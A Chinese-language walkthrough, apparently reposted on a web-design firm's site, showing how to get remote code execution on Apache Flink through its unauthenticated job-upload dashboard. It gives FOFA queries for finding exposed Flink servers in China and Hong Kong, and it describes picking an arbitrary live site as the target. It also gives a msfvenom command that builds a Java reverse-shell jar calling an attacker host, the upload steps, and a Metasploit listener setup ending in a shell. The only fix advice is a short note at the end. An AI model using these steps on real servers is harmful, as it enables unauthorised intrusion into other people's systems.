ApacheFlink未授權訪問+遠程代碼執(zhí)行的示例分析

這篇文章給大家分享的是有關Apache Flink未授權訪問+遠程代碼執(zhí)行的示例分析的內(nèi)容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。

創(chuàng)新互聯(lián)專業(yè)為企業(yè)提供襄城網(wǎng)站建設、襄城做網(wǎng)站、襄城網(wǎng)站設計、襄城網(wǎng)站制作等企業(yè)網(wǎng)站建設、網(wǎng)頁設計與制作、襄城企業(yè)網(wǎng)站模板建站服務,十年襄城做網(wǎng)站經(jīng)驗,不只是建網(wǎng)站,更提供有價值的思路和整體網(wǎng)絡服務。

 

Apache Flink 未授權訪問+遠程代碼執(zhí)行

FOFA

FOFA 語句
app="Apache-Flink" && country="CN"
app="Apache-Flink" && country="CN" && region="HK"
 
Apache Flink未授權訪問+遠程代碼執(zhí)行的示例分析  
  • 國內(nèi)還是很多使用 Apache Flink 的,大概有1K+的數(shù)量左右
 

漏洞復現(xiàn)


1、這里隨便搞個站打開進行復現(xiàn),打開以后就長這樣子。

Apache Flink未授權訪問+遠程代碼執(zhí)行的示例分析  

點擊Submit New Job翻譯:文件上傳 2、打開MSF 生成一個 jar 木馬

msfvenom -p java/meterpreter/reverse_tcp LHOST=**.***.59.61  LPORT=4444 -f jar > testone.jar
 
Apache Flink未授權訪問+遠程代碼執(zhí)行的示例分析  

3、點擊 Add 上傳 jar 文件

Apache Flink未授權訪問+遠程代碼執(zhí)行的示例分析  

4、設置監(jiān)聽端口

msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload java/shell/reverse_tcp 
payload => java/shell/reverse_tcp
msf5 exploit(multi/handler) > set lhost XX.XXX.XX.61
lhost => XX.XXX.XX.61
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run
 
Apache Flink未授權訪問+遠程代碼執(zhí)行的示例分析  

5、點擊下 submit

Apache Flink未授權訪問+遠程代碼執(zhí)行的示例分析  

6、反彈shell成功

Apache Flink未授權訪問+遠程代碼執(zhí)行的示例分析  
 

修復建議

建議用戶關注Apache Flink官網(wǎng),及時獲取該漏洞最新補丁。臨時解決建議 設置IP白名單只允許信任的IP訪問控制臺并添加訪問認證。

感謝各位的閱讀!關于“Apache Flink未授權訪問+遠程代碼執(zhí)行的示例分析”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,讓大家可以學到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!

本文名稱:ApacheFlink未授權訪問+遠程代碼執(zhí)行的示例分析
當前路徑:http://muchs.cn/article28/jpdjcp.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián),為您提供微信公眾號小程序開發(fā)、網(wǎng)站制作、標簽優(yōu)化、App設計、Google

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

成都seo排名網(wǎng)站優(yōu)化